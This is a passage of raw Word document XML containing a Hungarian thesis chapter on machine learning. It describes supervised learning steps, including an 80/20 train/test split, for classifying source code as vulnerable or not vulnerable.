        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="62D24643" w14:textId="77777777" w:rsidR="007036A9" w:rsidRPr="00D47FAE" w:rsidRDefault="007036A9" w:rsidP="001761E3">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="09581B22" w14:textId="7443D64D" w:rsidR="004D1468" w:rsidRPr="00D47FAE" w:rsidRDefault="00E40924" w:rsidP="00C116AD">
      <w:pPr>
        <w:pStyle w:val="Stlus1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="27"/>
        </w:numPr>
        <w:ind w:left="284" w:hanging="284"/>
      </w:pPr>
      <w:bookmarkStart w:id="12" w:name="_Toc71471968"/>
      <w:r w:rsidRPr="00D47FAE">
        <w:t>GÉPI TANULÁS</w:t>
      </w:r>
      <w:bookmarkEnd w:id="12"/>
    </w:p>
    <w:p w14:paraId="69814194" w14:textId="4143FDFC" w:rsidR="00843599" w:rsidRPr="00D47FAE" w:rsidRDefault="00843599" w:rsidP="00843599">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="292FDDAB" w14:textId="6DCA8F8D" w:rsidR="00C20476" w:rsidRPr="00490323" w:rsidRDefault="00132E27" w:rsidP="006F0AA9">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D47FAE">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve">A gépi tanulás az adatok mintázatának automatikus felfedezésének technikája. </w:t>
      </w:r>
      <w:r w:rsidR="006F6D32" w:rsidRPr="00490323">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>F</w:t>
      </w:r>
      <w:r w:rsidR="00C035F1" w:rsidRPr="00490323">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>orráskód</w:t>
      </w:r>
      <w:r w:rsidRPr="00490323">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve"> biztonsági kontextusban a gépi tanulást használják arra, hogy meghatározzák a </w:t>
      </w:r>
      <w:r w:rsidR="00490323" w:rsidRPr="00490323">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>forráskód</w:t>
      </w:r>
      <w:r w:rsidRPr="00490323">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00490323" w:rsidRPr="00490323">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>sérülékeny</w:t>
      </w:r>
      <w:r w:rsidRPr="00490323">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve"> vagy </w:t>
      </w:r>
      <w:r w:rsidR="00490323" w:rsidRPr="00490323">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>nem sérülékeny</w:t>
      </w:r>
      <w:r w:rsidRPr="00490323">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00490323" w:rsidRPr="00490323">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>kódként</w:t>
      </w:r>
      <w:r w:rsidRPr="00490323">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve"> történő besorolásának legpontosabb és leghatékonyabb módját a digitális eszközök legjobb védelme érdekében.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F10AF64" w14:textId="7B63824D" w:rsidR="00D92632" w:rsidRPr="00D47FAE" w:rsidRDefault="00F04A9D" w:rsidP="00D92632">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="567"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D47FAE">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>A g</w:t>
      </w:r>
      <w:r w:rsidR="00D92632" w:rsidRPr="00D47FAE">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>épi tanulási módszerek</w:t>
      </w:r>
      <w:r w:rsidRPr="00D47FAE">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>nek három fő kategóriáj</w:t>
      </w:r>
      <w:r w:rsidR="00AF61B4">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>a</w:t>
      </w:r>
      <w:r w:rsidRPr="00D47FAE">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve"> van: felügyelt</w:t>
      </w:r>
      <w:r w:rsidR="00EB49CF">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:r w:rsidR="00C25C00">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>supervised</w:t>
      </w:r>
      <w:r w:rsidR="00EB49CF">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidRPr="00D47FAE">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidR="00C75465" w:rsidRPr="00D47FAE">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve">felügyelet nélküli </w:t>
      </w:r>
      <w:r w:rsidR="00EB49CF">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidR="007613D3">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>unsupervised</w:t>
      </w:r>
      <w:r w:rsidR="00EB49CF">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve">) </w:t>
      </w:r>
      <w:r w:rsidR="00C75465" w:rsidRPr="00D47FAE">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>és félig felügyelt</w:t>
      </w:r>
      <w:r w:rsidR="00EB49CF">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:r w:rsidR="009034D9">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>reinforcement</w:t>
      </w:r>
      <w:r w:rsidR="00EB49CF">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidR="00C75465" w:rsidRPr="00D47FAE">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve"> tanulás.</w:t>
      </w:r>
      <w:r w:rsidR="00A20627" w:rsidRPr="00D47FAE">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve"> Az implementált programom a legelső módszert </w:t>
      </w:r>
      <w:r w:rsidR="00B63E22">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>alkalmazza</w:t>
      </w:r>
      <w:r w:rsidR="00A20627" w:rsidRPr="00D47FAE">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve">, így a fejezetben </w:t>
      </w:r>
      <w:r w:rsidR="00F561CD" w:rsidRPr="00D47FAE">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve">ehhez adok </w:t>
      </w:r>
      <w:r w:rsidR="00111144" w:rsidRPr="00D47FAE">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve">szélesebb körű </w:t>
      </w:r>
      <w:r w:rsidR="00886D2B" w:rsidRPr="00D47FAE">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>ismeretet.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01D267DC" w14:textId="0C497F17" w:rsidR="00DA782E" w:rsidRPr="00D47FAE" w:rsidRDefault="00DA782E" w:rsidP="00E56CA3">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="71F4D377" w14:textId="4CA29B5D" w:rsidR="00664B45" w:rsidRDefault="00122112" w:rsidP="00313C43">
      <w:pPr>
        <w:pStyle w:val="Cmsor2"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="426" w:hanging="426"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="13" w:name="_Toc71471969"/>
      <w:r w:rsidRPr="00D47FAE">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>Felügyelt tanulás</w:t>
      </w:r>
      <w:bookmarkEnd w:id="13"/>
    </w:p>
    <w:p w14:paraId="517BAD83" w14:textId="77777777" w:rsidR="006F0AA9" w:rsidRPr="00D47FAE" w:rsidRDefault="006F0AA9" w:rsidP="00E56CA3">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2B4D75C2" w14:textId="06E1D24B" w:rsidR="005E45D2" w:rsidRDefault="000F3480" w:rsidP="005E45D2">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D47FAE">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve">Felügyelt tanulás során címkézett adatkészletek felhasználásával algoritmusokat képeznek, amelyek pontosan osztályozzák az adatokat vagy előre jelzik az eredményeket. Ez a típusú tanulás segít a szervezeteknek számos valós problémát megoldani, például a fent említett </w:t>
      </w:r>
      <w:r w:rsidR="00FC4338">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>forráskód</w:t>
      </w:r>
      <w:r w:rsidR="00E1574E">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>ok</w:t>
      </w:r>
      <w:r w:rsidRPr="00D47FAE">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve"> osztályozása által.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F759272" w14:textId="12FF8C2A" w:rsidR="001C3DCB" w:rsidRPr="004F6D8B" w:rsidRDefault="0031379A" w:rsidP="00F94D48">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="567"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>Ahhoz, hogy egy algoritmus meg tudjon határozni egy eredményosztályt</w:t>
      </w:r>
      <w:r w:rsidR="00421D17">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve"> gépi tanulás által,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve"> ahhoz </w:t>
      </w:r>
      <w:r w:rsidR="00421D17">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>végig kell mennie annak felépítésén</w:t>
      </w:r>
      <w:r w:rsidR="00B31C06">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>ek</w:t>
      </w:r>
      <w:r w:rsidR="00421D17">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve"> és fejlesztésén</w:t>
      </w:r>
      <w:r w:rsidR="00B31C06">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve">ek </w:t>
      </w:r>
      <w:r w:rsidR="008253F0">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>lépcsőfokain</w:t>
      </w:r>
      <w:r w:rsidR="00421D17">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="00DE0A61" w:rsidRPr="004F6D8B">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve">A felügyelt gépi tanulás </w:t>
      </w:r>
      <w:r w:rsidR="003D7317" w:rsidRPr="004F6D8B">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve">felépítésének </w:t>
      </w:r>
      <w:r w:rsidR="00ED5317" w:rsidRPr="004F6D8B">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>hét</w:t>
      </w:r>
      <w:r w:rsidR="003D7317" w:rsidRPr="004F6D8B">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve"> alapvető lépése van</w:t>
      </w:r>
      <w:r w:rsidR="00BE4238" w:rsidRPr="004F6D8B">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08380C35" w14:textId="19ED5B12" w:rsidR="003B461B" w:rsidRDefault="001822F7" w:rsidP="003B461B">
      <w:pPr>
        <w:pStyle w:val="Listaszerbekezds"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="1134" w:hanging="283"/>
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>A</w:t>
      </w:r>
      <w:r w:rsidR="003D7317" w:rsidRPr="00F94D48">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve">datok gyűjtése és </w:t>
      </w:r>
      <w:r w:rsidR="006329D3">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve">2. </w:t>
      </w:r>
      <w:r w:rsidR="003D7317" w:rsidRPr="00F94D48">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>előkészítése</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BD23B09" w14:textId="182E371B" w:rsidR="004E46EC" w:rsidRDefault="003D7317" w:rsidP="00F371EB">
      <w:pPr>
        <w:pStyle w:val="Listaszerbekezds"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="1134"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004E46EC">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve">A </w:t>
      </w:r>
      <w:r w:rsidR="006970B4" w:rsidRPr="004E46EC">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>releváns</w:t>
      </w:r>
      <w:r w:rsidRPr="004E46EC">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve"> példák gyűjtése után</w:t>
      </w:r>
      <w:r w:rsidR="00F82F9A" w:rsidRPr="004E46EC">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>, az</w:t>
      </w:r>
      <w:r w:rsidRPr="004E46EC">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve"> előkészítéskor a példák két részhalmazba kerülnek</w:t>
      </w:r>
      <w:r w:rsidR="0095560C" w:rsidRPr="004E46EC">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve"> felügyelt tanulás során</w:t>
      </w:r>
      <w:r w:rsidR="000B5802" w:rsidRPr="004E46EC">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidR="007141BD" w:rsidRPr="004E46EC">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve">a </w:t>
      </w:r>
      <w:r w:rsidRPr="004E46EC">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>„train”</w:t>
      </w:r>
      <w:r w:rsidR="007141BD" w:rsidRPr="004E46EC">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve"> és a</w:t>
      </w:r>
      <w:r w:rsidRPr="004E46EC">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve"> „test”</w:t>
      </w:r>
      <w:r w:rsidR="007141BD" w:rsidRPr="004E46EC">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve"> halmazba</w:t>
      </w:r>
      <w:r w:rsidRPr="004E46EC">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>. A címkézett adatok (train)</w:t>
      </w:r>
      <w:r w:rsidR="0055761F" w:rsidRPr="004E46EC">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidR="00E53020" w:rsidRPr="004E46EC">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve">amely ideálisan </w:t>
      </w:r>
      <w:r w:rsidR="0055761F" w:rsidRPr="004E46EC">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>az összes adat ~80%-a</w:t>
      </w:r>
      <w:r w:rsidR="00273C8F" w:rsidRPr="004E46EC">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="004E46EC">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve"> az algoritmus tanítására szolgálnak. </w:t>
      </w:r>
      <w:r w:rsidR="003D4CBF">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>Forráskód</w:t>
      </w:r>
      <w:r w:rsidRPr="004E46EC">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="002F19CF" w:rsidRPr="004E46EC">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>biz</w:t>
      </w:r>
      <w:r w:rsidR="005F41D7" w:rsidRPr="004E46EC">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve">tonsági kontextusban </w:t>
      </w:r>
      <w:r w:rsidRPr="004E46EC">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve">a két címke – a fenti példából adódóan – a </w:t>
      </w:r>
      <w:r w:rsidR="0093795C">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>sérülékeny</w:t>
      </w:r>
      <w:r w:rsidRPr="004E46EC">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve"> és </w:t>
      </w:r>
      <w:r w:rsidR="0093795C">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>nem sérülékeny kód</w:t>
      </w:r>
      <w:r w:rsidRPr="004E46EC">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>. A nem címkézett adatokat (test)</w:t>
      </w:r>
      <w:r w:rsidR="004E54E1" w:rsidRPr="004E46EC">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve">, amely az összes adat maradék ~20%-a, </w:t>
      </w:r>
      <w:r w:rsidRPr="004E46EC">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve">az algoritmus önállóan címkézi fel, ezzel tesztelve, hogy a megállapítása jó-e vagy rossz. </w:t>
      </w:r>
      <w:r w:rsidR="002303FE" w:rsidRPr="004E46EC">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve">A halmazokra bontás egyszóval azért fontos, mert ugyanazok az adatsorok mind a </w:t>
      </w:r>
      <w:r w:rsidR="00427E84" w:rsidRPr="004E46EC">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>tanításhoz</w:t>
      </w:r>
      <w:r w:rsidR="002303FE" w:rsidRPr="004E46EC">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>, mind a</w:t>
      </w:r>
      <w:r w:rsidR="00427E84" w:rsidRPr="004E46EC">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve"> teszteléshez</w:t>
      </w:r>
      <w:r w:rsidR="002303FE" w:rsidRPr="004E46EC">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve"> nem adnának igazságos értékelést a modell teljesítményéről</w:t>
      </w:r>
      <w:r w:rsidR="004F5A06" w:rsidRPr="004E46EC">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>, ezáltal rontanák a modell hatékonyságát.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="332BCB3C" w14:textId="2B5F724D" w:rsidR="005434F2" w:rsidRDefault="00BE55C1" w:rsidP="00C116AD">
      <w:pPr>
        <w:pStyle w:val="Listaszerbekezds"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="27"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="1134" w:hanging="283"/>
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004E46EC">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>A</w:t>
      </w:r>
      <w:r w:rsidR="003D7317" w:rsidRPr="004E46EC">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>lgoritmus kiválasztása</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BB5D3F5" w14:textId="2774D09A" w:rsidR="00FC7DFF" w:rsidRPr="0098239A" w:rsidRDefault="003D7317" w:rsidP="005434F2">
      <w:pPr>
        <w:pStyle w:val="Listaszerbekezds"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="1134"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004E46EC">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>Az algoritmus típusa többek között függ a képzési adatkészlet típusától, az adatok mennyiségétől, valamint a megoldandó probléma típusától.</w:t>
      </w:r>
      <w:r w:rsidR="00F83456" w:rsidRPr="004E46EC">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00454F18">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve">A 2.3 alfejezeten </w:t>
      </w:r>
      <w:r w:rsidR="00B66411">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve">kerül </w:t>
      </w:r>
      <w:r w:rsidR="00985B16">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve">kifejtésre </w:t>
      </w:r>
      <w:r w:rsidR="00C57147">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve">az osztályozási </w:t>
      </w:r>
      <w:r w:rsidR="005E4B8B">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>algoritmusok</w:t>
      </w:r>
      <w:r w:rsidR="00C57147">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve"> teljesítmény</w:t>
      </w:r>
      <w:r w:rsidR="009E56ED">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve">ének </w:t>
      </w:r>
      <w:r w:rsidR="009E56ED">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>mérése</w:t>
      </w:r>
      <w:r w:rsidR="00233978">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>, amely lehetőséget ad azok összehasonlítására</w:t>
      </w:r>
      <w:r w:rsidR="00400DB4">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="005D5A02">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve">és teljesítményorientált </w:t>
      </w:r>
      <w:r w:rsidR="00400DB4">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>szelektálására.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D53E1C5" w14:textId="77777777" w:rsidR="00895002" w:rsidRDefault="003937B9" w:rsidP="00C116AD">
      <w:pPr>
        <w:pStyle w:val="Listaszerbekezds"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="27"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="1134" w:hanging="283"/>
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FC7DFF">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>Algoritmus betanítása</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="024745DE" w14:textId="4BBDEF10" w:rsidR="00D21F5F" w:rsidRDefault="00491946" w:rsidP="00895002">
      <w:pPr>
        <w:pStyle w:val="Listaszerbekezds"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="1134"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FC7DFF">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>Ez</w:t>
      </w:r>
      <w:r w:rsidR="006604D1" w:rsidRPr="00FC7DFF">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve"> a </w:t>
      </w:r>
      <w:r w:rsidR="002D2F11" w:rsidRPr="00FC7DFF">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>folyamat legfontosabb része.</w:t>
      </w:r>
      <w:r w:rsidR="00940EC8" w:rsidRPr="00FC7DFF">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00730A01" w:rsidRPr="00730A01">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve">A </w:t>
      </w:r>
      <w:r w:rsidR="00730A01">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve">konkrét </w:t>
      </w:r>
      <w:r w:rsidR="00730A01" w:rsidRPr="00730A01">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>„tanulás” nagy része ebben a szakaszban történik.</w:t>
      </w:r>
      <w:r w:rsidR="00730A01">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
